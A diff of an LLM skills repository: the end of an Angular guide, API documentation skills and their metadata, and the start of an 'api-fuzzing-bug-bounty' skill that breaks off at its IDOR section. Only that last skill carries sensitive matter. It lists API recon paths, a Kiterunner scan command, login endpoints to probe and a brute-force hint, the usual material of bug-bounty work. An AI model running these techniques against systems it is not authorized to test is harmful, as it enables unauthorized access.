  readonly notifications = computed(() => this._notifications());
  readonly unreadCount = computed(
    () => this._notifications().filter((n) => !n.read).length,
  );

  // Actions
  setUser(user: User | null) {
    this._user.set(user);
  }

  toggleTheme() {
    this._theme.update((t) => (t === "light" ? "dark" : "light"));
  }

  addNotification(notification: Notification) {
    this._notifications.update((n) => [...n, notification]);
  }
}
```

### Component Store Pattern with Signals

```typescript
import { Injectable, signal, computed, inject } from "@angular/core";
import { HttpClient } from "@angular/common/http";

@Injectable()
export class ProductStore {
  private http = inject(HttpClient);

  // State
  private _products = signal<Product[]>([]);
  private _loading = signal(false);
  private _filter = signal("");

  // Selectors
  readonly products = computed(() => this._products());
  readonly loading = computed(() => this._loading());
  readonly filteredProducts = computed(() => {
    const filter = this._filter().toLowerCase();
    return this._products().filter((p) =>
      p.name.toLowerCase().includes(filter),
    );
  });

  // Actions
  loadProducts() {
    this._loading.set(true);
    this.http.get<Product[]>("/api/products").subscribe({
      next: (products) => {
        this._products.set(products);
        this._loading.set(false);
      },
      error: () => this._loading.set(false),
    });
  }

  setFilter(filter: string) {
    this._filter.set(filter);
  }
}
```

---

## 9. Forms with Signals (Coming in v22+)

### Current Reactive Forms

```typescript
import { Component, inject } from "@angular/core";
import { FormBuilder, Validators, ReactiveFormsModule } from "@angular/forms";

@Component({
  selector: "app-user-form",
  standalone: true,
  imports: [ReactiveFormsModule],
  template: `
    <form [formGroup]="form" (ngSubmit)="onSubmit()">
      <input formControlName="name" placeholder="Name" />
      <input formControlName="email" type="email" placeholder="Email" />
      <button [disabled]="form.invalid">Submit</button>
    </form>
  `,
})
export class UserFormComponent {
  private fb = inject(FormBuilder);

  form = this.fb.group({
    name: ["", Validators.required],
    email: ["", [Validators.required, Validators.email]],
  });

  onSubmit() {
    if (this.form.valid) {
      console.log(this.form.value);
    }
  }
}
```

### Signal-Aware Form Patterns (Preview)

```typescript
// Future Signal Forms API (experimental)
import { Component, signal, computed } from '@angular/core';

@Component({...})
export class SignalFormComponent {
  name = signal('');
  email = signal('');

  // Computed validation
  isValid = computed(() =>
    this.name().length > 0 &&
    this.email().includes('@')
  );

  submit() {
    if (this.isValid()) {
      console.log({ name: this.name(), email: this.email() });
    }
  }
}
```

---

## 10. Performance Optimization

### Change Detection Strategies

```typescript
@Component({
  changeDetection: ChangeDetectionStrategy.OnPush,
  // Only checks when:
  // 1. Input signal/reference changes
  // 2. Event handler runs
  // 3. Async pipe emits
  // 4. Signal value changes
})
```

### Defer Blocks for Lazy Loading

```typescript
@Component({
  template: `
    <!-- Immediate loading -->
    <app-header />

    <!-- Lazy load when visible -->
    @defer (on viewport) {
      <app-heavy-chart />
    } @placeholder {
      <div class="skeleton" />
    } @loading (minimum 200ms) {
      <app-spinner />
    } @error {
      <p>Failed to load chart</p>
    }
  `
})
```

### NgOptimizedImage

```typescript
import { NgOptimizedImage } from '@angular/common';

@Component({
  imports: [NgOptimizedImage],
  template: `
    <img
      ngSrc="hero.jpg"
      width="800"
      height="600"
      priority
    />

    <img
      ngSrc="thumbnail.jpg"
      width="200"
      height="150"
      loading="lazy"
      placeholder="blur"
    />
  `
})
```

---

## 11. Testing Modern Angular

### Testing Signal Components

```typescript
import { ComponentFixture, TestBed } from "@angular/core/testing";
import { CounterComponent } from "./counter.component";

describe("CounterComponent", () => {
  let component: CounterComponent;
  let fixture: ComponentFixture<CounterComponent>;

  beforeEach(async () => {
    await TestBed.configureTestingModule({
      imports: [CounterComponent], // Standalone import
    }).compileComponents();

    fixture = TestBed.createComponent(CounterComponent);
    component = fixture.componentInstance;
    fixture.detectChanges();
  });

  it("should increment count", () => {
    expect(component.count()).toBe(0);

    component.increment();

    expect(component.count()).toBe(1);
  });

  it("should update DOM on signal change", () => {
    component.count.set(5);
    fixture.detectChanges();

    const el = fixture.nativeElement.querySelector(".count");
    expect(el.textContent).toContain("5");
  });
});
```

### Testing with Signal Inputs

```typescript
import { ComponentFixture, TestBed } from "@angular/core/testing";
import { ComponentRef } from "@angular/core";
import { UserCardComponent } from "./user-card.component";

describe("UserCardComponent", () => {
  let fixture: ComponentFixture<UserCardComponent>;
  let componentRef: ComponentRef<UserCardComponent>;

  beforeEach(async () => {
    await TestBed.configureTestingModule({
      imports: [UserCardComponent],
    }).compileComponents();

    fixture = TestBed.createComponent(UserCardComponent);
    componentRef = fixture.componentRef;

    // Set signal inputs via setInput
    componentRef.setInput("id", "123");
    componentRef.setInput("name", "John Doe");

    fixture.detectChanges();
  });

  it("should display user name", () => {
    const el = fixture.nativeElement.querySelector("h3");
    expect(el.textContent).toContain("John Doe");
  });
});
```

---

## Best Practices Summary

| Pattern              | ✅ Do                          | ❌ Don't                        |
| -------------------- | ------------------------------ | ------------------------------- |
| **State**            | Use Signals for local state    | Overuse RxJS for simple state   |
| **Components**       | Standalone with direct imports | Bloated SharedModules           |
| **Change Detection** | OnPush + Signals               | Default CD everywhere           |
| **Lazy Loading**     | `@defer` and `loadComponent`   | Eager load everything           |
| **DI**               | `inject()` function            | Constructor injection (verbose) |
| **Inputs**           | `input()` signal function      | `@Input()` decorator (legacy)   |
| **Zoneless**         | Enable for new projects        | Force on legacy without testing |

---

## Resources

- [Angular.dev Documentation](https://angular.dev)
- [Angular Signals Guide](https://angular.dev/guide/signals)
- [Angular SSR Guide](https://angular.dev/guide/ssr)
- [Angular Update Guide](https://angular.dev/update-guide)
- [Angular Blog](https://blog.angular.dev)

---

## Common Troubleshooting

| Issue                          | Solution                                                   |
| ------------------------------ | ---------------------------------------------------------- |
| Signal not updating UI         | Ensure `OnPush` + call the signal as a function: `count()` |
| Hydration mismatch             | Check server/client content consistency                    |
| Circular dependency            | Use `inject()` with `forwardRef`                           |
| Zoneless not detecting changes | Trigger via signal updates, not mutations                  |
| SSR fetch fails                | Use `TransferState` or `withFetch()`                       |
14
packages/llm/skills/angular/metadata.json
Normal file
@ -0,0 +1,14 @@
{
  "version": "1.0.0",
  "organization": "Antigravity Awesome Skills",
  "date": "February 2026",
  "abstract": "Comprehensive guide to modern Angular development (v20+) designed for AI agents and LLMs. Covers Signals, Standalone Components, Zoneless applications, SSR/Hydration, reactive patterns, routing, dependency injection, and modern forms. Emphasizes component-driven architecture with practical examples and migration strategies for modernizing existing codebases.",
  "references": [
    "https://angular.dev",
    "https://angular.dev/guide/signals",
    "https://angular.dev/guide/zoneless",
    "https://angular.dev/guide/ssr",
    "https://angular.dev/guide/standalone-components",
    "https://angular.dev/guide/defer"
  ]
}
487
packages/llm/skills/api-documentation-generator/SKILL.md
Normal file
@ -0,0 +1,487 @@
---
name: api-documentation-generator
description: "Generate comprehensive, developer-friendly API documentation from code, including endpoints, parameters, examples, and best practices"
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Documentation Generator

## Overview

Automatically generate clear, comprehensive API documentation from your codebase. This skill helps you create professional documentation that includes endpoint descriptions, request/response examples, authentication details, error handling, and usage guidelines.

Perfect for REST APIs, GraphQL APIs, and WebSocket APIs.

## When to Use This Skill

- Use when you need to document a new API
- Use when updating existing API documentation
- Use when your API lacks clear documentation
- Use when onboarding new developers to your API
- Use when preparing API documentation for external users
- Use when creating OpenAPI/Swagger specifications

## How It Works

### Step 1: Analyze the API Structure

First, I'll examine your API codebase to understand:

- Available endpoints and routes
- HTTP methods (GET, POST, PUT, DELETE, etc.)
- Request parameters and body structure
- Response formats and status codes
- Authentication and authorization requirements
- Error handling patterns

### Step 2: Generate Endpoint Documentation

For each endpoint, I'll create documentation including:

**Endpoint Details:**

- HTTP method and URL path
- Brief description of what it does
- Authentication requirements
- Rate limiting information (if applicable)

**Request Specification:**

- Path parameters
- Query parameters
- Request headers
- Request body schema (with types and validation rules)

**Response Specification:**

- Success response (status code + body structure)
- Error responses (all possible error codes)
- Response headers

**Code Examples:**

- cURL command
- JavaScript/TypeScript (fetch/axios)
- Python (requests)
- Other languages as needed

### Step 3: Add Usage Guidelines

I'll include:

- Getting started guide
- Authentication setup
- Common use cases
- Best practices
- Rate limiting details
- Pagination patterns
- Filtering and sorting options

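Pagination in particular benefits from a runnable example in the guidelines. Below is a minimal cursor-pagination sketch; the `fetch_page` function and the `items`/`next_cursor` field names are assumptions to adapt to the API being documented:

```python
# Minimal cursor-pagination sketch. `fetch_page` stands in for a real
# HTTP call (e.g. requests.get); the `items`/`next_cursor` field names
# are assumptions -- match them to your API's response schema.
def iterate_all(fetch_page, page_size=2):
    """Yield every item across pages until the API stops returning a cursor."""
    cursor = None
    while True:
        page = fetch_page(cursor=cursor, limit=page_size)
        yield from page["items"]
        cursor = page.get("next_cursor")
        if cursor is None:
            break

# Stubbed backend so the sketch runs without a network:
_DATA = list(range(5))

def fake_fetch(cursor=None, limit=2):
    start = cursor or 0
    chunk = _DATA[start:start + limit]
    nxt = start + limit if start + limit < len(_DATA) else None
    return {"items": chunk, "next_cursor": nxt}

print(list(iterate_all(fake_fetch)))  # → [0, 1, 2, 3, 4]
```

A snippet like this, included next to the pagination section, saves consumers from rediscovering the cursor contract by trial and error.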
### Step 4: Document Error Handling

Clear error documentation including:

- All possible error codes
- Error message formats
- Troubleshooting guide
- Common error scenarios and solutions

### Step 5: Create Interactive Examples

Where possible, I'll provide:

- Postman collection
- OpenAPI/Swagger specification
- Interactive code examples
- Sample responses

## Examples

### Example 1: REST API Endpoint Documentation

```markdown
## Create User

Creates a new user account.

**Endpoint:** `POST /api/v1/users`

**Authentication:** Required (Bearer token)

**Request Body:**
\`\`\`json
{
  "email": "user@example.com",   // Required: Valid email address
  "password": "SecurePass123!",  // Required: Min 8 chars, 1 uppercase, 1 number
  "name": "John Doe",            // Required: 2-50 characters
  "role": "user"                 // Optional: "user" or "admin" (default: "user")
}
\`\`\`

**Success Response (201 Created):**
\`\`\`json
{
  "id": "usr_1234567890",
  "email": "user@example.com",
  "name": "John Doe",
  "role": "user",
  "createdAt": "2026-01-20T10:30:00Z",
  "emailVerified": false
}
\`\`\`

**Error Responses:**

- `400 Bad Request` - Invalid input data
  \`\`\`json
  {
    "error": "VALIDATION_ERROR",
    "message": "Invalid email format",
    "field": "email"
  }
  \`\`\`

- `409 Conflict` - Email already exists
  \`\`\`json
  {
    "error": "EMAIL_EXISTS",
    "message": "An account with this email already exists"
  }
  \`\`\`

- `401 Unauthorized` - Missing or invalid authentication token

**Example Request (cURL):**
\`\`\`bash
curl -X POST https://api.example.com/api/v1/users \
  -H "Authorization: Bearer YOUR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "email": "user@example.com",
    "password": "SecurePass123!",
    "name": "John Doe"
  }'
\`\`\`

**Example Request (JavaScript):**
\`\`\`javascript
const response = await fetch('https://api.example.com/api/v1/users', {
  method: 'POST',
  headers: {
    'Authorization': `Bearer ${token}`,
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    email: 'user@example.com',
    password: 'SecurePass123!',
    name: 'John Doe'
  })
});

const user = await response.json();
console.log(user);
\`\`\`

**Example Request (Python):**
\`\`\`python
import requests

response = requests.post(
    'https://api.example.com/api/v1/users',
    headers={
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    },
    json={
        'email': 'user@example.com',
        'password': 'SecurePass123!',
        'name': 'John Doe'
    }
)

user = response.json()
print(user)
\`\`\`
```

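When error responses are documented in a stable shape like the one above, it also helps to show consumers how to branch on them. A minimal client-side sketch (the error codes mirror the example; `send_request` is a stub standing in for a real HTTP call):

```python
# Sketch of client-side handling for the documented {"error", "message"}
# error shape. `send_request` is a stub standing in for an HTTP library.
class ApiError(Exception):
    def __init__(self, code, message):
        super().__init__(message)
        self.code = code

def create_user(send_request, payload):
    status, body = send_request("POST", "/api/v1/users", payload)
    if status == 201:
        return body
    # Error bodies follow the documented {"error": ..., "message": ...} shape.
    raise ApiError(body.get("error", "UNKNOWN"), body.get("message", ""))

# Stubbed transport that rejects duplicate emails, as in the 409 example:
def fake_send(method, path, payload):
    if payload["email"] == "taken@example.com":
        return 409, {"error": "EMAIL_EXISTS",
                     "message": "An account with this email already exists"}
    return 201, {"id": "usr_1", **payload}

user = create_user(fake_send, {"email": "new@example.com", "name": "John Doe"})
print(user["id"])  # → usr_1
try:
    create_user(fake_send, {"email": "taken@example.com", "name": "Jane"})
except ApiError as e:
    print(e.code)  # → EMAIL_EXISTS
```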
### Example 2: GraphQL API Documentation

```markdown
## User Query

Fetch user information by ID.

**Query:**
\`\`\`graphql
query GetUser($id: ID!) {
  user(id: $id) {
    id
    email
    name
    role
    createdAt
    posts {
      id
      title
      publishedAt
    }
  }
}
\`\`\`

**Variables:**
\`\`\`json
{
  "id": "usr_1234567890"
}
\`\`\`

**Response:**
\`\`\`json
{
  "data": {
    "user": {
      "id": "usr_1234567890",
      "email": "user@example.com",
      "name": "John Doe",
      "role": "user",
      "createdAt": "2026-01-20T10:30:00Z",
      "posts": [
        {
          "id": "post_123",
          "title": "My First Post",
          "publishedAt": "2026-01-21T14:00:00Z"
        }
      ]
    }
  }
}
\`\`\`

**Errors:**
\`\`\`json
{
  "errors": [
    {
      "message": "User not found",
      "extensions": {
        "code": "USER_NOT_FOUND",
        "userId": "usr_1234567890"
      }
    }
  ]
}
\`\`\`
```

### Example 3: Authentication Documentation

```markdown
## Authentication

All API requests require authentication using Bearer tokens.

### Getting a Token

**Endpoint:** `POST /api/v1/auth/login`

**Request:**
\`\`\`json
{
  "email": "user@example.com",
  "password": "your-password"
}
\`\`\`

**Response:**
\`\`\`json
{
  "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
  "expiresIn": 3600,
  "refreshToken": "refresh_token_here"
}
\`\`\`

### Using the Token

Include the token in the Authorization header:

\`\`\`
Authorization: Bearer YOUR_TOKEN
\`\`\`

### Token Expiration

Tokens expire after 1 hour. Use the refresh token to get a new access token:

**Endpoint:** `POST /api/v1/auth/refresh`

**Request:**
\`\`\`json
{
  "refreshToken": "refresh_token_here"
}
\`\`\`
```

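The refresh flow described in that example can itself be illustrated with a small wrapper. A sketch, assuming stand-in `login`/`refresh` functions for the `/auth/login` and `/auth/refresh` endpoints and the field names from the example response:

```python
import time

# Sketch of the documented refresh flow. `login` and `refresh` are stubs
# standing in for the /auth/login and /auth/refresh endpoints.
class TokenManager:
    def __init__(self, login, refresh):
        self._refresh = refresh
        self._apply(login())

    def _apply(self, creds):
        self.token = creds["token"]
        self.refresh_token = creds["refreshToken"]
        # Refresh slightly early to avoid using a token at the edge of expiry.
        self.expires_at = time.time() + creds["expiresIn"] - 30

    def get_token(self):
        if time.time() >= self.expires_at:
            self._apply(self._refresh(self.refresh_token))
        return self.token

# Stubbed endpoints:
def fake_login():
    return {"token": "t1", "expiresIn": 3600, "refreshToken": "r1"}

def fake_refresh(refresh_token):
    return {"token": "t2", "expiresIn": 3600, "refreshToken": "r2"}

mgr = TokenManager(fake_login, fake_refresh)
print(mgr.get_token())   # → t1
mgr.expires_at = 0       # simulate expiry
print(mgr.get_token())   # → t2
```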
## Best Practices

### ✅ Do This

- **Be Consistent** - Use the same format for all endpoints
- **Include Examples** - Provide working code examples in multiple languages
- **Document Errors** - List all possible error codes and their meanings
- **Show Real Data** - Use realistic example data, not "foo" and "bar"
- **Explain Parameters** - Describe what each parameter does and its constraints
- **Version Your API** - Include version numbers in URLs (/api/v1/)
- **Add Timestamps** - Show when documentation was last updated
- **Link Related Endpoints** - Help users discover related functionality
- **Include Rate Limits** - Document any rate limiting policies
- **Provide Postman Collection** - Make it easy to test your API

### ❌ Don't Do This

- **Don't Skip Error Cases** - Users need to know what can go wrong
- **Don't Use Vague Descriptions** - "Gets data" is not helpful
- **Don't Forget Authentication** - Always document auth requirements
- **Don't Ignore Edge Cases** - Document pagination, filtering, sorting
- **Don't Leave Examples Broken** - Test all code examples
- **Don't Use Outdated Info** - Keep documentation in sync with code
- **Don't Overcomplicate** - Keep it simple and scannable
- **Don't Forget Response Headers** - Document important headers

## Documentation Structure

### Recommended Sections

1. **Introduction**
   - What the API does
   - Base URL
   - API version
   - Support contact

2. **Authentication**
   - How to authenticate
   - Token management
   - Security best practices

3. **Quick Start**
   - Simple example to get started
   - Common use case walkthrough

4. **Endpoints**
   - Organized by resource
   - Full details for each endpoint

5. **Data Models**
   - Schema definitions
   - Field descriptions
   - Validation rules

6. **Error Handling**
   - Error code reference
   - Error response format
   - Troubleshooting guide

7. **Rate Limiting**
   - Limits and quotas
   - Headers to check
   - Handling rate limit errors

8. **Changelog**
   - API version history
   - Breaking changes
   - Deprecation notices

9. **SDKs and Tools**
   - Official client libraries
   - Postman collection
   - OpenAPI specification

## Common Pitfalls

### Problem: Documentation Gets Out of Sync

**Symptoms:** Examples don't work, parameters are wrong, endpoints return different data

**Solution:**

- Generate docs from code comments/annotations
- Use tools like Swagger/OpenAPI
- Add API tests that validate documentation
- Review docs with every API change

### Problem: Missing Error Documentation

**Symptoms:** Users don't know how to handle errors, support tickets increase

**Solution:**

- Document every possible error code
- Provide clear error messages
- Include troubleshooting steps
- Show example error responses

### Problem: Examples Don't Work

**Symptoms:** Users can't get started, frustration increases

**Solution:**

- Test every code example
- Use real, working endpoints
- Include complete examples (not fragments)
- Provide a sandbox environment

### Problem: Unclear Parameter Requirements

**Symptoms:** Users send invalid requests, validation errors

**Solution:**

- Mark required vs optional clearly
- Document data types and formats
- Show validation rules
- Provide example values

## Tools and Formats

### OpenAPI/Swagger

Generate interactive documentation:

```yaml
openapi: 3.0.0
info:
  title: My API
  version: 1.0.0
paths:
  /users:
    post:
      summary: Create a new user
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/CreateUserRequest'
```

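A spec in this shape can also be linted automatically to keep docs from drifting. A minimal stdlib-only sketch over an already-parsed spec dict; the rule chosen here ("every operation needs a summary") is just an illustration, not a full linter:

```python
# Minimal OpenAPI lint sketch: flag operations missing a summary.
# Works on the parsed spec dict (load YAML/JSON with your tool of choice).
HTTP_METHODS = {"get", "post", "put", "patch", "delete", "head", "options"}

def missing_summaries(spec):
    problems = []
    for path, ops in spec.get("paths", {}).items():
        for method, op in ops.items():
            if method in HTTP_METHODS and not op.get("summary"):
                problems.append(f"{method.upper()} {path}")
    return problems

spec = {
    "openapi": "3.0.0",
    "paths": {
        "/users": {
            "post": {"summary": "Create a new user"},
            "get": {},  # no summary -> should be flagged
        }
    },
}
print(missing_summaries(spec))  # → ['GET /users']
```

Wired into CI, a check like this is one concrete way to implement the "add API tests that validate documentation" advice above.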
### Postman Collection

Export collection for easy testing:

```json
{
  "info": {
    "name": "My API",
    "schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
  },
  "item": [
    {
      "name": "Create User",
      "request": {
        "method": "POST",
        "url": "{{baseUrl}}/api/v1/users"
      }
    }
  ]
}
```

## Related Skills

- `@doc-coauthoring` - For collaborative documentation writing
- `@copywriting` - For clear, user-friendly descriptions
- `@test-driven-development` - For ensuring API behavior matches docs
- `@systematic-debugging` - For troubleshooting API issues

## Additional Resources

- [OpenAPI Specification](https://swagger.io/specification/)
- [REST API Best Practices](https://restfulapi.net/)
- [GraphQL Documentation](https://graphql.org/learn/)
- [API Design Patterns](https://www.apiguide.com/)
- [Postman Documentation](https://learning.postman.com/docs/)

---

**Pro Tip:** Keep your API documentation as close to your code as possible. Use tools that generate docs from code comments to ensure they stay in sync!
163
packages/llm/skills/api-documentation/SKILL.md
Normal file
@ -0,0 +1,163 @@
---
name: api-documentation
description: "API documentation workflow for generating OpenAPI specs, creating developer guides, and maintaining comprehensive API documentation."
category: granular-workflow-bundle
risk: safe
source: personal
date_added: "2026-02-27"
---

# API Documentation Workflow

## Overview

Specialized workflow for creating comprehensive API documentation including OpenAPI/Swagger specs, developer guides, code examples, and interactive documentation.

## When to Use This Workflow

Use this workflow when:

- Creating API documentation
- Generating OpenAPI specs
- Writing developer guides
- Adding code examples
- Setting up API portals

## Workflow Phases

### Phase 1: API Discovery

#### Skills to Invoke

- `api-documenter` - API documentation
- `api-design-principles` - API design

#### Actions

1. Inventory endpoints
2. Document request/response
3. Identify authentication
4. Map error codes
5. Note rate limits

#### Copy-Paste Prompts

```
Use @api-documenter to discover and document API endpoints
```

### Phase 2: OpenAPI Specification

#### Skills to Invoke

- `openapi-spec-generation` - OpenAPI
- `api-documenter` - API specs

#### Actions

1. Create OpenAPI schema
2. Define paths
3. Add schemas
4. Configure security
5. Add examples

#### Copy-Paste Prompts

```
Use @openapi-spec-generation to create OpenAPI specification
```

### Phase 3: Developer Guide

#### Skills to Invoke

- `api-documentation-generator` - Documentation
- `documentation-templates` - Templates

#### Actions

1. Create getting started
2. Write authentication guide
3. Document common patterns
4. Add troubleshooting
5. Create FAQ

#### Copy-Paste Prompts

```
Use @api-documentation-generator to create developer guide
```

### Phase 4: Code Examples

#### Skills to Invoke

- `api-documenter` - Code examples
- `tutorial-engineer` - Tutorials

#### Actions

1. Create example requests
2. Write SDK examples
3. Add curl examples
4. Create tutorials
5. Test examples

#### Copy-Paste Prompts

```
Use @api-documenter to generate code examples
```

### Phase 5: Interactive Docs

#### Skills to Invoke

- `api-documenter` - Interactive docs

#### Actions

1. Set up Swagger UI
2. Configure Redoc
3. Add try-it functionality
4. Test interactivity
5. Deploy docs

#### Copy-Paste Prompts

```
Use @api-documenter to set up interactive documentation
```

### Phase 6: Documentation Site

#### Skills to Invoke

- `docs-architect` - Documentation architecture
- `wiki-page-writer` - Documentation

#### Actions

1. Choose platform
2. Design structure
3. Create pages
4. Add navigation
5. Configure search

#### Copy-Paste Prompts

```
Use @docs-architect to design API documentation site
```

### Phase 7: Maintenance

#### Skills to Invoke

- `api-documenter` - Doc maintenance

#### Actions

1. Set up auto-generation
2. Configure validation
3. Add review process
4. Schedule updates
5. Monitor feedback

#### Copy-Paste Prompts

```
Use @api-documenter to set up automated doc generation
```

## Quality Gates

- [ ] OpenAPI spec complete
- [ ] Developer guide written
- [ ] Code examples working
- [ ] Interactive docs functional
- [ ] Documentation deployed

## Related Workflow Bundles

- `documentation` - Documentation
- `api-development` - API development
- `development` - Development
182
packages/llm/skills/api-documenter/SKILL.md
Normal file
@ -0,0 +1,182 @@
---
name: api-documenter
description: Master API documentation with OpenAPI 3.1, AI-powered tools, and modern developer experience practices. Create interactive docs, generate SDKs, and build comprehensive developer portals.
risk: unknown
source: community
date_added: '2026-02-27'
---

You are an expert API documentation specialist mastering modern developer experience through comprehensive, interactive, and AI-enhanced documentation.

## Use this skill when

- Creating or updating OpenAPI/AsyncAPI specifications
- Building developer portals, SDK docs, or onboarding flows
- Improving API documentation quality and discoverability
- Generating code examples or SDKs from API specs

## Do not use this skill when

- You only need a quick internal note or informal summary
- The task is pure backend implementation without docs
- There is no API surface or spec to document

## Instructions

1. Identify target users, API scope, and documentation goals.
2. Create or validate specifications with examples and auth flows.
3. Build interactive docs and ensure accuracy with tests.
4. Plan maintenance, versioning, and migration guidance.

## Purpose

Expert API documentation specialist focusing on creating world-class developer experiences through comprehensive, interactive, and accessible API documentation. Masters modern documentation tools, OpenAPI 3.1+ standards, and AI-powered documentation workflows while ensuring documentation drives API adoption and reduces developer integration time.

## Capabilities

### Modern Documentation Standards

- OpenAPI 3.1+ specification authoring with advanced features
- API-first design documentation with contract-driven development
- AsyncAPI specifications for event-driven and real-time APIs
- GraphQL schema documentation and SDL best practices
- JSON Schema validation and documentation integration
- Webhook documentation with payload examples and security considerations
- API lifecycle documentation from design to deprecation

### AI-Powered Documentation Tools

- AI-assisted content generation with tools like Mintlify and ReadMe AI
- Automated documentation updates from code comments and annotations
- Natural language processing for developer-friendly explanations
- AI-powered code example generation across multiple languages
- Intelligent content suggestions and consistency checking
- Automated testing of documentation examples and code snippets
- Smart content translation and localization workflows

### Interactive Documentation Platforms

- Swagger UI and Redoc customization and optimization
- Stoplight Studio for collaborative API design and documentation
- Insomnia and Postman collection generation and maintenance
- Custom documentation portals with frameworks like Docusaurus
- API Explorer interfaces with live testing capabilities
- Try-it-now functionality with authentication handling
- Interactive tutorials and onboarding experiences

### Developer Portal Architecture

- Comprehensive developer portal design and information architecture
- Multi-API documentation organization and navigation
- User authentication and API key management integration
- Community features including forums, feedback, and support
- Analytics and usage tracking for documentation effectiveness
- Search optimization and discoverability enhancements
- Mobile-responsive documentation design

### SDK and Code Generation

- Multi-language SDK generation from OpenAPI specifications
- Code snippet generation for popular languages and frameworks
- Client library documentation and usage examples
- Package manager integration and distribution strategies
- Version management for generated SDKs and libraries
- Custom code generation templates and configurations
- Integration with CI/CD pipelines for automated releases

### Authentication and Security Documentation

- OAuth 2.0 and OpenID Connect flow documentation
- API key management and security best practices
- JWT token handling and refresh mechanisms
- Rate limiting and throttling explanations
- Security scheme documentation with working examples
- CORS configuration and troubleshooting guides
- Webhook signature verification and security

### Testing and Validation

- Documentation-driven testing with contract validation
- Automated testing of code examples and curl commands
- Response validation against schema definitions
- Performance testing documentation and benchmarks
- Error simulation and troubleshooting guides
- Mock server generation from documentation
- Integration testing scenarios and examples

### Version Management and Migration

- API versioning strategies and documentation approaches
- Breaking change communication and migration guides
- Deprecation notices and timeline management
- Changelog generation and release note automation
- Backward compatibility documentation
- Version-specific documentation maintenance
- Migration tooling and automation scripts

### Content Strategy and Developer Experience

- Technical writing best practices for developer audiences
- Information architecture and content organization
- User journey mapping and onboarding optimization
- Accessibility standards and inclusive design practices
- Performance optimization for documentation sites
- SEO optimization for developer content discovery
- Community-driven documentation and contribution workflows

### Integration and Automation

- CI/CD pipeline integration for documentation updates
- Git-based documentation workflows and version control
- Automated deployment and hosting strategies
- Integration with development tools and IDEs
- API testing tool integration and synchronization
- Documentation analytics and feedback collection
- Third-party service integrations and embeds

## Behavioral Traits

- Prioritizes developer experience and time-to-first-success
- Creates documentation that reduces support burden
- Focuses on practical, working examples over theoretical descriptions
- Maintains accuracy through automated testing and validation
- Designs for discoverability and progressive disclosure
- Builds inclusive and accessible content for diverse audiences
- Implements feedback loops for continuous improvement
- Balances comprehensiveness with clarity and conciseness
- Follows docs-as-code principles for maintainability
- Considers documentation as a product requiring user research

## Knowledge Base

- OpenAPI 3.1 specification and ecosystem tools
- Modern documentation platforms and static site generators
- AI-powered documentation tools and automation workflows
- Developer portal best practices and information architecture
- Technical writing principles and style guides
- API design patterns and documentation standards
- Authentication protocols and security documentation
- Multi-language SDK generation and distribution
- Documentation testing frameworks and validation tools
- Analytics and user research methodologies for documentation

## Response Approach

1. **Assess documentation needs** and target developer personas
2. **Design information architecture** with progressive disclosure
3. **Create comprehensive specifications** with validation and examples
4. **Build interactive experiences** with try-it-now functionality
5. **Generate working code examples** across multiple languages
6. **Implement testing and validation** for accuracy and reliability
7. **Optimize for discoverability** and search engine visibility
8. **Plan for maintenance** and automated updates

## Example Interactions

- "Create a comprehensive OpenAPI 3.1 specification for this REST API with authentication examples"
- "Build an interactive developer portal with multi-API documentation and user onboarding"
- "Generate SDKs in Python, JavaScript, and Go from this OpenAPI spec"
- "Design a migration guide for developers upgrading from API v1 to v2"
- "Create webhook documentation with security best practices and payload examples"
- "Build automated testing for all code examples in our API documentation"
- "Design an API explorer interface with live testing and authentication"
- "Create comprehensive error documentation with troubleshooting guides"
436
packages/llm/skills/api-fuzzing-bug-bounty/SKILL.md
Normal file
@ -0,0 +1,436 @@
---
name: api-fuzzing-bug-bounty
description: "This skill should be used when the user asks to \"test API security\", \"fuzz APIs\", \"find IDOR vulnerabilities\", \"test REST API\", \"test GraphQL\", \"API penetration testing\", \"bug b..."
risk: unknown
source: community
date_added: "2026-02-27"
---

# API Fuzzing for Bug Bounty

## Purpose

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

## Inputs/Prerequisites

- Burp Suite or similar proxy tool
- API wordlists (SecLists, api_wordlist)
- Understanding of REST/GraphQL/SOAP protocols
- Python for scripting
- Target API endpoints and documentation (if available)

## Outputs/Deliverables

- Identified API vulnerabilities
- IDOR exploitation proofs
- Authentication bypass techniques
- SQL injection points
- Unauthorized data access documentation

---

## API Types Overview

| Type | Protocol | Data Format | Structure |
|------|----------|-------------|-----------|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom Query | Single endpoint |

---

## Core Workflow

### Step 1: API Reconnaissance

Identify API type and enumerate endpoints:

```bash
# Check for Swagger/OpenAPI documentation
/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json
```

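The `json2paths.py` step can be approximated in a few lines of stdlib Python. A minimal sketch (assumes a Swagger/OpenAPI document with the standard `paths` object; the real script may differ):

```python
import json

# Minimal stand-in for a json2paths-style helper: list every
# "METHOD /path" pair found in a Swagger/OpenAPI document.
def extract_paths(spec):
    routes = []
    for path, ops in spec.get("paths", {}).items():
        for method in ops:
            if method.lower() in {"get", "post", "put", "patch", "delete"}:
                routes.append(f"{method.upper()} {path}")
    return routes

# Inline example spec in place of reading swagger.json from disk:
spec = json.loads(
    '{"paths": {"/users": {"get": {}, "post": {}}, "/users/{id}": {"get": {}}}}'
)
for route in extract_paths(spec):
    print(route)
```

The resulting route list feeds directly into the fuzzing steps that follow.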
### Step 2: Authentication Testing
|
||||
|
||||
```bash
|
||||
# Test different login paths
|
||||
/api/mobile/login
|
||||
/api/v3/login
|
||||
/api/magic_link
|
||||
/api/admin/login
|
||||
|
||||
# Check rate limiting on auth endpoints
|
||||
# If no rate limit → brute force possible
|
||||
|
||||
# Test mobile vs web API separately
|
||||
# Don't assume same security controls
|
||||
```

### Step 3: IDOR Testing

Insecure Direct Object Reference (IDOR) is the most common API vulnerability:

```bash
# Basic IDOR
